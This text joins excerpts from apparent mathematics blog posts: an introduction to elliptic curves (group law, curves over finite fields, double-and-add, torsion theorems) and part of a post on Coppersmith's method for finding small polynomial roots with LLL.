Let \((x_0,y_0)\) be a singular point. Then taking partial derivatives leaves us with \(2y_0 = 3x_0^2+A=0\), which gives \(y_0=0\) and \(A=-3x_0^2\). Substituting back into the original curve we have \(0 = y_0^2 = x_0^3 + (-3x_0^2)x_0 + B\), so \(B=2x_0^3\). The discriminant gives \[ \Delta = 4(-3x_0^2)^3+27(2x_0^3)^2=27\cdot 4(-x_0^6+x_0^6)=0. \]
If \(\Delta=0\), then the equation \(x^3+Ax+B\) has a double root \(x_0\). This happens when the derivative at \(x_0\) is zero. Now the derivative of \(x^3+Ax+B\) at \(x_0\) is \(3x_0^2+A\), which is the same as \(-\frac{\partial f}{\partial x}(x_0,0)\), so \(\frac{\partial f}{\partial x}(x_0,0)=0\).
Then let’s consider \((x_0,0)\), we have \(\frac{\partial f}{\partial y}(x_0,0)=0\), and \((x_0,0)\) is a point in the curve since \(f(x_0,0) = 0^2 - (x_0^3 + Ax_0 + B) = 0\) (since \(x_0\) is a root to the cubic polynomial). This shows that \(\Delta=0\) implies \((x_0,0)\) is a singular point, so \(E\) is singular.
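The two directions of the argument can be sanity-checked numerically. The sketch below works over the integers and uses this post's normalisation \(\Delta=4A^3+27B^2\); the function names are invented for the illustration. It builds singular curves from the relations \(A=-3x_0^2\), \(B=2x_0^3\) derived above and checks that \((x_0,0)\) is a singular point with \(\Delta=0\).

```python
def f(x, y, A, B):
    """f(x, y) = y^2 - (x^3 + A x + B)."""
    return y * y - (x**3 + A * x + B)

def df_dx(x, y, A, B):
    return -(3 * x * x + A)

def df_dy(x, y, A, B):
    return 2 * y

def is_singular_point(x, y, A, B):
    """On the curve, with both partial derivatives vanishing."""
    return f(x, y, A, B) == 0 and df_dx(x, y, A, B) == 0 and df_dy(x, y, A, B) == 0

def delta(A, B):
    """Discriminant in the normalisation 4A^3 + 27B^2."""
    return 4 * A**3 + 27 * B**2

for x0 in range(-3, 4):
    A, B = -3 * x0**2, 2 * x0**3
    print(x0, (A, B), delta(A, B), is_singular_point(x0, 0, A, B))

# A non-singular example: y^2 = x^3 - x + 1 at the point (0, 1).
print(delta(-1, 1), is_singular_point(0, 1, -1, 1))
```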
A non well-defined function is actually NOT a function, since you have one input mapping to many outputs, so non well-defined function is a misnomer. To understand the intricacies, readers can refer to the definition of function using relations: we say a relation \(R\subseteq X\times Y\) is a function if \(\forall x\in X, y_1,y_2\in Y\), \((x,y_1)\in R\) and \((x,y_2)\in R\) implies \(y_1=y_2\), so each \(x\) can only map to one value of \(y\). Further, \(\forall x\in X\), there exists some \(y\) such that \((x,y)\in R\) (so every \(x\) is mapped). Then we can use \(y=f(x)\) to denote \((x,y)\in R\).
Prerequisites: The definition of a group
2021-12-16: Added some more example code
To start out, we can first state what an elliptic curve is in an easy-to-understand form: An elliptic curve over a field \(K\), denoted \(E(K)\), is the set of solutions to the equation \[y^2 + a_1xy+a_3y = x^3 + a_2x^2 + a_4x + a_6\] where \(x\) and \(y\) are both in \(K\), along with a distinguished point at infinity, usually denoted \(\infty\) or \(\mathcal{O}\).
If the characteristic of \(K\) is not 2 or 3 (for example \(\mathbb{R},\mathbb{C}\), \(\mathbb{Z}_p\) with \(p\) prime and larger than 3 (note we shall use \(\mathbb{Z}_p\) to denote the field \(\mathbb{Z}/p\mathbb{Z}\))), then we can simplify the equation using some coordinate transformations to get a much simpler equation of the form\[ y^2=x^3+Ax+B \] This is called the Weierstrass form. For simplicity we shall consider the Weierstrass form in the following posts.
If the coefficients of the elliptic curve are in a field \(L\), then we say that the curve is defined over \(L\). For example, the curve \(y^2=x^3-x+1\) is defined over \(\mathbb{Q}\). We can consider the solutions of the elliptic curve where the coordinates are in \(\mathbb{Q}\), but also in its extensions like \(\bar{\mathbb{Q}}\) (the field of algebraic numbers), \(\mathbb{R}\) and \(\mathbb{C}\) (which is the algebraic closure of \(\mathbb{R}\)).^{1}
We can graph elliptic curves defined over \(\mathbb{R}\) in \(\mathbb{R}^2\) and it can look like this:
\(y^2=x^3-x+1,\Delta=-368\)
\(y^2=x^3+x=x(x^2+1),\Delta=-64\)
\(y^2=x^3-x=(x-1)x(x+1),\Delta=64\)
\(y^2=x^3,\Delta=0\)
\(y^2=x^3+x^2=x^2(x+1),\Delta=0\) (Not in Weierstrass Form)
We also define the quantity \(\Delta\), called the discriminant, as \(\Delta=-16(4A^3+27B^2)\). If \(\Delta\) is non-zero, then we call the curve non-singular, and we will just study non-singular elliptic curves in this post.
We note that this discriminant is, up to a positive constant factor, the discriminant of the cubic equation \(x^3+Ax+B=0\). The discriminant being 0 means that the cubic has a repeated root, making the curve “non-differentiable” at some point, so we do not worry about these curves. On the other hand, if the discriminant is positive, then the cubic has 3 distinct real roots; and if it is negative, then it has only 1 real root.
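The discriminants quoted next to the graphs above can be reproduced with a few lines of Python. This is a small sketch for curves with integer coefficients; the function names are invented for the illustration.

```python
def discriminant(A: int, B: int) -> int:
    """Discriminant of y^2 = x^3 + A x + B, as defined above."""
    return -16 * (4 * A**3 + 27 * B**2)

def describe(A: int, B: int) -> str:
    """Classify the curve by the sign of its discriminant."""
    delta = discriminant(A, B)
    if delta == 0:
        return "singular"
    return "3 real roots" if delta > 0 else "1 real root"

curves = {
    "y^2 = x^3 - x + 1": (-1, 1),
    "y^2 = x^3 + x": (1, 0),
    "y^2 = x^3 - x": (-1, 0),
    "y^2 = x^3": (0, 0),
}
for name, (A, B) in curves.items():
    print(name, discriminant(A, B), describe(A, B))
```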
We have the definition of elliptic curve, which is great. But how about the “group law” we are used to hearing for elliptic curve? Indeed if we just look at the curve, it is not apparent that a group law can be defined over an elliptic curve.
Take a “differentiable” elliptic curve. Then we can define an “addition” operation of any two points on the curve as follows:
If one of the points is the point at infinity, WLOG assume \(P=\mathcal{O}\), then \(P+Q=\mathcal{O}+Q=Q\). The same holds for \(Q=\mathcal{O}\).
If we take two points \(P\) and \(Q\) on the curve (with \(P\neq Q\)), neither of them the point at infinity, we can draw a line through those two points. Then (just take for granted that) the intersection of that line and the elliptic curve will contain another point \(R\) on the curve (besides \(P\) and \(Q\) already). If it really does not exist (for vertical lines), we can still say that the third point of intersection is \(\mathcal{O}\).
For example if you are considering the point \((x,y)\) and \((x,-y)\), then the straight line will not intersect any other points on the curve, so we say \(\mathcal{O}\) is the third point of intersection.
As an example, we consider the curve \[y^2=x^3-x+1\] Let \(P=(0,1)\) and \(Q=(3,5)\). Check to see that \(P\) and \(Q\) are on the curve. Then we can draw a line passing through \(P\) and \(Q\) to find a third point \(R\).
Then, if the coordinate of the third point is \((x,y)\), then \(P+Q\) is defined as the point \((x,\mathbf{-y})\). The geometric meaning is to draw a vertical line on the third point, and the other intersection is what we call \(P+Q\). In this case, we can do the algebra (or just use the explicit formula) to find that the third point of intersection has coordinate \((-\frac{11}{9},-\frac{17}{27})\), so \(P+Q = (-\frac{11}{9},\frac{17}{27})\).
What if \(P=Q\)? Then instead of drawing a line that passes through two points, we just draw the tangent of the curve at \(P\). Then the line will intersect the curve at another point again (actually it still has 3 intersections, just with one repeated root). Then the procedure is the same as above.
If we have \(P=(x,y)\), then since \((x,y) + (x,-y) = \mathcal{O}\), the inverse of \(P\) is \((x,-y)\). We can just denote the inverse as \(-P\). Note that this means that if \(P\), \(Q\) and \(R\) are collinear, then \(P+Q+R=\mathcal{O}\).
The operation we defined this way has several properties: For any points \(P,Q,R\in E\) (\(E\) is the elliptic curve),
The first and second properties are trivially true from our construction. The third one is true by the geometric intuition. The fourth property, associativity, is actually very difficult to prove. You can use the explicit formula for addition to validate it, but it is very cumbersome. We will just take associativity for granted.
Then the operation we defined makes \(E\) into a group!
The formula, or actually the algorithm for point addition is as follows: For \(P=(x_1,y_1)\) and \(Q=(x_2,y_2)\) both in the elliptic curve \(E\), if we want to calculate \(P+Q\),
Now let \(x=\lambda^2-x_1-x_2, y=\lambda(x_1-x)-y_1\), we have \(P+Q=(x,y)\).
The only non-obvious part is (4). If \(P\neq Q\), then \(\lambda\) is the slope of the line that passes through \(P\) and \(Q\). If \(P=Q\), then \(\lambda\) is the slope of the tangent of the curve at \(P\), since by implicit differentiation (actually just the formal derivative) \[2y\,\frac{dy}{dx}=3x^2+A,\qquad\text{so}\qquad \lambda=\frac{3x_1^2+A}{2y_1}.\]
Now the equation of the line will be \(y = \lambda x + \nu\), where \(\nu = y_1 - \lambda x_1\) is the y-intercept of the line. Now substitute the line equation into the elliptic curve equation to find the intersections: \(\begin{align*} (\lambda x + \nu)^2 &= x^3+Ax+B\\ \lambda^2x^2 + 2\lambda\nu x + \nu^2 &= x^3+Ax+B\\ x^3 - \lambda^2 x^2 + (A-2\lambda\nu)x + (B-\nu^2) &= 0 \end{align*}\)
This is a cubic equation, but we do not need to actually solve it, since we already know two of the intersections of the line with the curve, namely \(P\) and \(Q\) by construction! So the above cubic has the factor \((x-x_1)(x-x_2)\), and we get\[ x^3 - \lambda^2 x^2 + (A-2\lambda\nu)x + (B-\nu^2)=(x-x_1)(x-x_2)(x-x_3) \] where we use \(x_3\) to denote the \(x\)-coordinate of the unknown intersection. Now compare the \(x^2\) coefficients on both sides: the left hand side gives \(-\lambda^2\), and the right hand side gives the negative of the sum of the \(x_i\)’s, so \(-\lambda^2 = - x_1 - x_2 - x_3\). So \(x_3 = \lambda^2 - x_1 - x_2\).
To recover the \(y\)-coordinate, we just substitute \(x_3\) into the line \(y=\lambda x+\nu\), and get \(y_3=\lambda x_3 + \nu\), then expand to get \(y_3 = \lambda x_3 + y_1 - \lambda x_1 = \lambda (x_3-x_1) + y_1\).
Then \(P+Q\) will be this point reflected along the x-axis, so we just get the negative of \(y_3\), and we get our desired \(P+Q=(x_3, \lambda(x_1-x_3)-y_1)\).
We note that the algorithm for point addition never uses the value of \(B\). This is curious: if the points we are “adding” actually lie on a curve with a different \(B\), the formula is still the same.
We can define an elliptic curve over the rationals (in computers we use rational numbers instead of real numbers as we can’t represent real numbers accurately anyway). Let’s define the curve \(y^2 = x^3-x+1\) as \(E\), and take the points \(P=(0,1)\) and \(Q=(3,5)\) on the curve. We can also see the discriminant of \(E\) is \(-368\).
Note that \(P\) is represented as \((0:1:1)\) instead of just \((0,1)\), but we can ignore the third coordinate for now.
Let’s add \(P\) and \(Q\) to verify our above calculation.
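As a rough sketch of the addition algorithm derived above, here is a plain Python version over the rationals using `fractions.Fraction`. The names `ec_add` and `O`, and the choice to represent the point at infinity as `None`, are assumptions made for this illustration and are not taken from any particular library.

```python
from fractions import Fraction

O = None  # the point at infinity (representation chosen for this sketch)

def ec_add(P, Q, A):
    """Add two points on y^2 = x^3 + A*x + B. Note that B is never used."""
    if P is O:
        return Q
    if Q is O:
        return P
    (x1, y1), (x2, y2) = P, Q
    if x1 == x2 and y1 == -y2:
        return O  # P + (-P) = O; this also covers doubling a point with y = 0
    if P == Q:
        lam = (3 * x1 * x1 + A) / (2 * y1)  # slope of the tangent at P
    else:
        lam = (y2 - y1) / (x2 - x1)         # slope of the chord through P and Q
    x3 = lam * lam - x1 - x2
    y3 = lam * (x1 - x3) - y1               # third intersection reflected in the x-axis
    return (x3, y3)

A, B = Fraction(-1), Fraction(1)            # the curve y^2 = x^3 - x + 1
P = (Fraction(0), Fraction(1))
Q = (Fraction(3), Fraction(5))
R = ec_add(P, Q, A)
print(R)
```

Here the chord through \(P\) and \(Q\) has slope \(\lambda = 4/3\), so the sum is \((-11/9, 17/27)\), which can be checked to lie on the curve again.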
So far we have been concerned with elliptic curves over the reals. However, in cryptography, we often need to work with elliptic curves over a finite field \(\mathbb{F}_p\) for \(p\) prime. Recall that \(\mathbb{F}_p\) is just the set \(\{0,1,\cdots,p-1\}\) with addition and multiplication done mod \(p\).
We can, of course, define an elliptic curve over \(\mathbb{F}_p\) using the same definition as for the reals, and for the point addition, we use the same formulae, except that division becomes multiplication by the modular inverse. All the theory of addition and group structure still applies.
In the case of \(\mathbb{F}_p\), the elliptic curve only consists of finitely many points, as \(\mathbb{F}_p^2\) only has \(p^2\) points anyway. Moreover, since each \(x\) corresponds to at most 2 values of \(y\) (because any polynomial of degree \(d\) over a field has at most \(d\) roots), the number of points is at most \(2p+1\).
We have an even better bound on the number of points on the curve over \(\mathbb{F}_p\) (even over \(\mathbb{F}_{p^n}\) for any positive integer \(n\)), and this is called Hasse’s Theorem: If \(\#E(\mathbb{F}_q)\) is the number of points on an elliptic curve over \(\mathbb{F}_q\) for \(q\) a prime or a power of a prime, then \[ (q+1)-2\sqrt{q}\leq \#E(\mathbb{F}_q)\leq (q+1)+2\sqrt{q}\]
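For a small prime the point count can simply be brute-forced. The sketch below (the helper name `count_points` is made up for this example) counts the points of \(y^2=x^3-x+1\) over \(\mathbb{F}_7\) and compares the result with Hasse's bound in its usual form \(\lvert \#E(\mathbb{F}_q)-(q+1)\rvert\leq 2\sqrt{q}\).

```python
import math

def count_points(A, B, p):
    """Count points of y^2 = x^3 + A*x + B over F_p by brute force (small p only)."""
    # For each residue s, record how many y in F_p satisfy y^2 = s.
    square_counts = {}
    for y in range(p):
        s = y * y % p
        square_counts[s] = square_counts.get(s, 0) + 1
    total = 1  # start with the point at infinity
    for x in range(p):
        rhs = (x ** 3 + A * x + B) % p
        total += square_counts.get(rhs, 0)
    return total

p = 7
n_points = count_points(-1, 1, p)
within_hasse = abs(n_points - (p + 1)) <= 2 * math.sqrt(p)
print(n_points, within_hasse)
```

This is only meant for toy sizes; the loop is linear in \(p\), which is hopeless for cryptographic fields.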
On the other hand, we may also want to know the structure of \(E(\mathbb{F}_p)\). Actually, it is either cyclic, or a product of two cyclic groups, but we will not discuss this here.
It also makes sense to define the scalar multiple of a point \(P\) to just be adding the point \(P\) to itself a number of times. We use the notation \([n]P = \underbrace{P+\cdots+P}_{n\text{ times}}\) for positive \(n\), and \([n]P = \underbrace{-P-\cdots-P}_{\lvert n\rvert\text{ times}}\) for negative \(n\). We can also say that \([0]P=\mathcal{O}\).
Are there any fast ways to compute \([n]P\)? The naive way is to add \(P\) to itself \(n\) times. But just like the repeated squaring method in modular exponentiation, we can take a similar approach here, and we call this the double-and-add algorithm.
let bits be the bit representation of \(n\), most significant bit first
let \(P\) be the point to be multiplied
let R = \(\mathcal{O}\).
for i from 0 to bits.length() - 1:
    \(R = [2]R\)
    if bits[i] == 1:
        \(R = R + P\)
return \(R\)
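The pseudocode above translates fairly directly into Python. This is a minimal sketch over \(\mathbb{F}_p\), assuming the point at infinity is represented by `None` and using `pow(x, -1, p)` (Python 3.8+) for the modular inverse; `ec_add` and `scalar_mult` are names chosen for this example.

```python
O = None  # point at infinity (representation chosen for this sketch)

def ec_add(P, Q, A, p):
    """Add points on y^2 = x^3 + A*x + B over F_p (p an odd prime)."""
    if P is O:
        return Q
    if Q is O:
        return P
    (x1, y1), (x2, y2) = P, Q
    if x1 == x2 and (y1 + y2) % p == 0:
        return O
    if P == Q:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, p) % p
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, p) % p
    x3 = (lam * lam - x1 - x2) % p
    y3 = (lam * (x1 - x3) - y1) % p
    return (x3, y3)

def scalar_mult(n, P, A, p):
    """Compute [n]P by scanning the bits of n from most to least significant."""
    if P is O:
        return O
    if n < 0:
        return scalar_mult(-n, (P[0], -P[1] % p), A, p)  # [n]P = [-n](-P)
    R = O
    for bit in bin(n)[2:]:
        R = ec_add(R, R, A, p)      # double
        if bit == "1":
            R = ec_add(R, P, A, p)  # add
    return R

# y^2 = x^3 - x + 1 over F_7
print(scalar_mult(2, (3, 5), -1, 7))
print(scalar_mult(6, (5, 3), -1, 7))
```

The loop runs once per bit of \(n\), so it needs about \(\log_2 n\) doublings and at most as many additions, instead of \(n\) additions.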
We may have that \([n]P=\mathcal{O}\) for some positive \(n\). The smallest positive \(n\) such that \([n]P=\mathcal{O}\) is called the order of \(P\). For an elliptic curve over a finite field, every point has finite order. If there is no \(n\) such that \([n]P=\mathcal{O}\), then we say the point has infinite order.
If the order of the point is equal to the number of points \(N\) on the curve, this means that \([m]P\) reaches all the points on the curve as \(m\) goes from \(1\) to \(N\), and we call this \(P\) a generator of the elliptic curve. Note that we do not always have a generator, as \(E(\mathbb{F}_p)\) may not be cyclic as mentioned above.
For example, we can use the curve \(y^2=x^3-x+1\) again, and we note that the point \((3,5)\) over the rationals has infinite order. Actually, we can even see that only the point at infinity (represented as \((0:1:0)\)) has finite order (actually order is just 1).
However, over \(\mathbb{F}_7\), we can find that the point \((3,5)\) has order 3.
We can also find that \(E(\mathbb{F}_7)\) has 12 points, that it is isomorphic to the group \(\mathbb{Z}/12\mathbb{Z}\) (which is cyclic), and that \((5,3)\) is a generator of \(E(\mathbb{F}_7)\) (i.e. has order 12).
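These claims about \(E(\mathbb{F}_7)\) are small enough to check by brute force. The following sketch lists all points of \(y^2=x^3-x+1\) over \(\mathbb{F}_7\) and computes point orders by repeated addition; the helper names and the use of `None` for the point at infinity are assumptions of this example.

```python
O = None  # point at infinity (representation chosen for this sketch)
A, B, p = -1, 1, 7

def ec_add(P, Q):
    """Add two points of y^2 = x^3 + A*x + B over F_p."""
    if P is O:
        return Q
    if Q is O:
        return P
    (x1, y1), (x2, y2) = P, Q
    if x1 == x2 and (y1 + y2) % p == 0:
        return O
    if P == Q:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, p) % p
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, p) % p
    x3 = (lam * lam - x1 - x2) % p
    return (x3, (lam * (x1 - x3) - y1) % p)

def order(P):
    """Smallest n >= 1 with [n]P = O, found by adding P repeatedly."""
    n, R = 1, P
    while R is not O:
        R = ec_add(R, P)
        n += 1
    return n

# All affine points, plus the point at infinity.
points = [O] + [(x, y) for x in range(p) for y in range(p)
                if (y * y - (x ** 3 + A * x + B)) % p == 0]
generators = [P for P in points if order(P) == len(points)]
print(len(points), order((3, 5)), order((5, 3)))
```

The list `generators` is non-empty exactly when the group is cyclic, which is the case here.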
Elliptic curves over the rationals may still have points of finite order. For example, for the curve \(y^2=x^3+1\), there are 6 points of finite order. The point \((2,-3)\) has order 6. We can verify this by multiplying the point \((2,-3)\) by 6 to get the point at infinity.
In fact, a much stronger result is true.
Theorem (Mordell-Weil): For \(K\) a global field, \(E(K)\) is finitely generated.
Let’s specialise to the field of rational numbers \(\mathbb{Q}\), which is indeed a global field. The theorem says that \(E(\mathbb{Q})\) consists of the points of finite order (the torsion subgroup, denoted \(E(\mathbb{Q})_{\text{tors}}\)), which form a finite group, together with an infinite part isomorphic to \(\mathbb{Z}^r\) for some non-negative integer \(r\).
For elliptic curves over \(\mathbb{Q}\) (with integer coefficients \(A\) and \(B\)), the points of finite order \(P=(x,y)\) satisfy the following two conditions:
Corollary (Lutz, Nagell):
- \(x\) and \(y\) are both integers.
- Either \([2]P=\mathcal{O}\), or \(y^2\) divides \(4A^3+27B^2\).
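The two conditions give a finite search: every torsion point has integer coordinates and either \(y=0\) or \(y^2\) dividing \(4A^3+27B^2\). The sketch below enumerates the affine candidates for \(y^2=x^3+1\). It assumes integer \(A, B\), and the function names are made up for this example. Note that the conditions are only necessary, so in general each candidate still has to be checked for finite order.

```python
import math

def integer_roots_of_cubic(A, C):
    """Integer roots of x^3 + A*x + C."""
    if C == 0:
        candidates = {0}              # x * (x^2 + A) = 0
        if -A >= 0:
            r = math.isqrt(-A)
            if r * r == -A:
                candidates |= {r, -r}
    else:
        # Any integer root must divide the constant term C.
        divisors = [t for t in range(1, abs(C) + 1) if C % t == 0]
        candidates = set(divisors) | {-t for t in divisors}
    return sorted(x for x in candidates if x ** 3 + A * x + C == 0)

def torsion_candidates(A, B):
    """Affine integer points with y = 0 or y^2 dividing 4A^3 + 27B^2."""
    D = abs(4 * A ** 3 + 27 * B ** 2)
    ys = [0] + [y for y in range(1, math.isqrt(D) + 1) if D % (y * y) == 0]
    points = []
    for y in ys:
        for x in integer_roots_of_cubic(A, B - y * y):
            points.append((x, y))
            if y != 0:
                points.append((x, -y))
    return sorted(points)

candidates = torsion_candidates(0, 1)   # the curve y^2 = x^3 + 1
print(candidates)
```

Together with the point at infinity this gives 6 candidates, matching the 6 points of finite order mentioned earlier for this curve.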
We have a strong theorem about the torsion subgroup:
Theorem (Mazur):
The structure of the torsion subgroup of elliptic curve over \(\mathbb{Q}\) can only be (isomorphic to) one of the following 15 groups:
- \(\mathbb{Z}/n\mathbb{Z}\) for \(n=1,2,\cdots,9,10,12\).
- \(\mathbb{Z}/2\mathbb{Z}\times \mathbb{Z}/2n\mathbb{Z}\) for \(n=1,2,3,4\).
But we shall explore no further in this direction.
This time we have explored the very basic concepts of the elliptic curve, and how a group operation is defined over it. However, this still leaves some questions unanswered.
Actually, what is the point at infinity really doing? It magically makes the elliptic curve into a group, because indeed sometimes you really do not have the third point of intersection of the line and the curve. Is there any geometric meaning?
Why are the points represented as \((x:y:1)\) and infinity as \((0:1:0)\)?
We will answer this question in the next part.
Silverman, J. H. (2009). The arithmetic of elliptic curves (2nd ed., Graduate Texts in Mathematics, Vol. 106). New York: Springer.
The correct definition of an elliptic curve considers a field \(K\), then defines an elliptic curve over \(K\), and considers all the solutions of the curve where the coordinates are in \(\bar{K}\), the algebraic closure of \(K\) (the smallest field containing \(K\) that is algebraically closed: every polynomial with coefficients in that field has a root). However, we shall not consider this, as in the case of \(\mathbb{Z}/p\mathbb{Z}\) we only care about solutions in \(\mathbb{Z}/p\mathbb{Z}\).
Prerequisite: Coppersmith’s Method (Part I): Introduction
In this post, you just need to remember that the first vector returned by the LLL algorithm will satisfy \[ |b_1| \leq 2^{\frac{n-1}{4}}(\det L)^{\frac{1}{n}}\]And that LLL algorithm runs in polynomial time of \(n\) (the dimension of lattice) and \(\log\max\limits_{b_i\in B}\|b_i\|\) (the log of length of largest vector in the input).
The proofs we are going to do today are constructive, meaning that we are creating an algorithm that is able to solve our problem. The conditions are there because the algorithm requires them, and so the logic may seem reversed (in fact it is kind of self-referential) if you do not have much mathematical maturity. Kind of like this:
Recall: We use the convention that \(F(x)=\sum\limits_{i=0}^d a_i x^i\) is a polynomial with integer coefficients of degree \(d\) (so \(a_d\neq 0\)). Let \(x_0\) be a root of \(F(x)\equiv 0\pmod{N}\) such that \(\lvert x_0\rvert < X\) for some integer \(X\). For that \(X\), we associate the polynomial \(F\) with the vector \(b_F = (a_0, a_1X, a_2X^2, \cdots, a_d X^d)\), and we may use the two notations interchangeably. The norm of a vector \(v=(v_1,\cdots v_n)\) is denoted \(\lvert\lvert v\rvert\rvert = \sqrt{\sum\limits_{i=1}^n v_i^2}\).
Theorem (Howgrave-Graham) If \(\lvert\lvert b_F\rvert\rvert < \frac{N}{\sqrt{d+1}}\), then \(F(x_0)=0\) over the integers (instead of mod \(N\) only).
The proof can be found in the first part and is not difficult, but let’s also include it here for self-containedness.
Proof First we note that \(\sum\limits_{i=1}^n x_i \leq \sqrt{n \cdot \sum\limits_{i=1}^n x_i^2}\) by the Cauchy-Schwarz inequality. Then
\[\begin{align*} \lvert F(x_0)\rvert =& \left\lvert \sum\limits_{i=0}^d a_i x_0^i\right\rvert\\ \leq& \sum\limits_{i=0}^d \lvert a_i\rvert\ \lvert x_0^i\rvert\\ < &\sum\limits_{i=0}^d \lvert a_i\rvert X^i\\ \leq &\sqrt{d+1} \lvert\lvert b_F\rvert\rvert\text{ (by the above inequality)}\\ < &\sqrt{d+1}\frac{N}{\sqrt{d+1}}\\ =& N \end{align*}\]So \(-N < F(x_0) < N\). Since \(F(x_0) \equiv 0\pmod{N}\), this means \(F(x_0) = 0\) (without mod).
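To see the Howgrave-Graham condition at work, here is a toy numeric check. The polynomial \(F(x)=x^2-5x+6\), the modulus \(N=50\) and the bound \(X=4\) are arbitrary values picked for this illustration; the point is only that once \(\lVert b_F\rVert < N/\sqrt{d+1}\), the roots mod \(N\) that are smaller than \(X\) in absolute value are honest integer roots, while larger roots mod \(N\) need not be.

```python
import math

N = 50
coeffs = [6, -5, 1]      # F(x) = x^2 - 5x + 6, lowest degree first (toy example)
X = 4                    # bound on the size of the roots we care about
d = len(coeffs) - 1

def F(x):
    return sum(a * x ** i for i, a in enumerate(coeffs))

# The vector b_F = (a_0, a_1 X, ..., a_d X^d) and its Euclidean norm.
b_F = [a * X ** i for i, a in enumerate(coeffs)]
norm = math.sqrt(sum(v * v for v in b_F))
condition_holds = norm < N / math.sqrt(d + 1)

all_roots_mod_N = [x for x in range(N) if F(x) % N == 0]
small_roots_mod_N = [x for x in range(-X + 1, X) if F(x) % N == 0]
integer_roots = [x for x in range(-X + 1, X) if F(x) == 0]
print(condition_holds, all_roots_mod_N, small_roots_mod_N, integer_roots)
```

In this example \(27\) and \(28\) are roots mod \(50\) but not over the integers; they are simply outside the range \(\lvert x\rvert < X\) that the theorem talks about.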
Here we are using the lattice vectors to correspond to polynomials. If all the basis vectors \(b_i\) (or equivalently polynomials) that span a lattice \(\mathcal{L}\) have a common root \(\alpha\) (so \(b_i(\alpha)=0\) for all \(i\)), then any vector in the lattice will also have the root \(\alpha\), since \(\forall v\in \mathcal{L}\), \[v(\alpha) = \sum_i c_i b_i(\alpha) = \sum_i c_i\cdot 0 = 0\] We will exploit this property in our derivation.
Let \(\displaystyle B=\left[\begin{array}{cccccc} N & & & & & \\ & N X & & & & \\ & & N X^{2} & & & \\ & & & \ddots & & \\ & & & & NX^{d-1} & \\ a_{0} & a_{1} X & a_{2} X^{2} & \cdots & a_{d-1} X^{d-1} & X^{d} \end{array}\right]_{(d+1)\times(d+1)}\)
Since this matrix is lower-triangular, the determinant of \(B\) is the product of diagonals: \(\det B = N^d X^{\frac{d(d+1)}{2}}\).
Theorem Let \(G(x)\) be the polynomial corresponding to \(b_{1}\) after LLL on \(L(B)\). Set \(C_{1}(d)=2^{-\frac{1}{2}}(d+1)^{-\frac{1}{d}}\). If \[\displaystyle X<C_{1}(d) N^{\frac{2}{d(d+1)}},\]
then any root \(x_{0}\) of \(F(x) \bmod N\) such that \(\lvert x_0\rvert<X\) satisfies \(G(x_0)=0\) in \(\mathbb{Z}\).
Proof: After performing LLL on \(B\), the first vector \(b_1\) (which will correspond to a polynomial \(G\)) will satisfy \(\quad\left\|b_{1}\right\| \leq 2^{\frac{n-1}{4}}(\det L)^{\frac{1}{n}}=2^{\frac{d}{4}} N^{\frac{d}{d+1}} X^{\frac{d}{2}}\) (as \(n=d+1\)). To satisfy Howgrave-Graham, we need
\[\left\|b_{1}\right\|<\frac{N}{\sqrt{d+1}}\]If \(\quad\left\|b_{1}\right\| \leq 2^{\frac{d}{4}} N^{\frac{d}{d+1}} X^{\frac{d}{2}} < \frac{N}{\sqrt{d+1}}\), then the condition will be satisfied. Now
\[\begin{align*} 2^{\frac{d}{4}} N^{\frac{d}{d+1}} X^{\frac{d}{2}} < &\frac{N}{\sqrt{d+1}}\\ 2^{\frac d4} X^{\frac d2} \sqrt{d+1} <& N^{1-\frac{d}{d+1}}\\ \left(2^{\frac 12}(d+1)^{\frac 1d}\right)^{\frac{d}{2}} X^{\frac d2} <& N^{\frac{1}{d+1}}\\ C_1(d)^{-\frac d2} X^{\frac d2} <& N^{\frac{1}{d+1}}\\ X^{\frac d2} <&C_1(d)^{\frac d2}N^{\frac{1}{d+1}}\\ X < & C_1(d) N^{\frac{2}{d(d+1)}} \end{align*}\]So \(X < C_1(d) N^{\frac{2}{d(d+1)}}\) ensures that the condition in the Howgrave-Graham theorem holds, and then the statement in the theorem holds. QED.
This seems like a good method to recover small roots of polynomials mod \(N\)! However, the bound for \(X\) is very small: we have \(X\approx N^{\frac{2}{d(d+1)}}\). For example, for \(N=10001\) and \(d=3\), the bound for \(X\) is only \(2.07\), which is not useful at all.
The remedy here is to note that by increasing the dimension \(n\) of \(B\), the resulting bound for \(X\) will be higher.
One idea would be to use higher order polynomials: apart from using the polynomials \(g_i(x)=Nx^{i}\) and \(F(x)\) itself, we also use the x-shifts of \(F\), i.e.\[xF(x), x^2F(x),\cdots,x^kF(x)\] Then the right hand side of the Howgrave-Graham bound will be \(\frac{N}{\sqrt{d+1+k}}\). This way the resulting bound is higher: taking \(k=d-1\) makes \(X\approx N^{\frac{1}{2d-1}}\) (note that the power of the modulus is unchanged)! For example, again for \(N=10001, d=3\), if we add the 2 x-shifts \(xF(x)\) and \(x^2F(x)\), the new bound will be about \(3.11\).
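The numbers in these examples can be reproduced with a few lines of Python. The sketch below assumes the lattice spanned by \(Nx^i\) for \(i<d\) together with \(F, xF, \ldots, x^kF\), which has dimension \(n=d+1+k\) and determinant \(N^dX^{n(n-1)/2}\); plugging this into the LLL bound and the Howgrave-Graham condition gives \(X < 2^{-1/2}\,n^{-1/(n-1)}\,N^{2(n-d)/(n(n-1))}\). The function name `root_bound` is made up for this example.

```python
def root_bound(N, d, k=0):
    """Bound on X from LLL + Howgrave-Graham when k x-shifts of F are added."""
    n = d + 1 + k                              # lattice dimension
    exponent = 2 * (n - d) / (n * (n - 1))     # exponent of N in the bound
    return 2 ** -0.5 * n ** (-1 / (n - 1)) * N ** exponent

N, d = 10001, 3
no_shifts = root_bound(N, d)           # k = 0: the basic lattice
two_shifts = root_bound(N, d, k=2)     # k = d - 1: exponent becomes 1/(2d - 1)
print(round(no_shifts, 2), round(two_shifts, 2))
```

With \(k=0\) this is exactly \(C_1(d)N^{\frac{2}{d(d+1)}}\), and with \(k=d-1\) the exponent of \(N\) is \(\frac{1}{2d-1}\).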
The second idea is to increase the power of \(N\) on the right hand side by taking powers of \(F\). This means that instead of considering polynomials mod \(N\), we are considering them mod \(N^h\) for some positive integer \(h\). Note that \(F(x)\equiv 0\pmod{N}\implies N^{h-k}F^k(x)\equiv 0\pmod{N^h}\) for any \(0\leq k\leq h\). So we can certainly work mod \(N^h\) and have a bigger bound for the small roots, and every small root of the original polynomial mod \(N\) is still a root of the new polynomials.
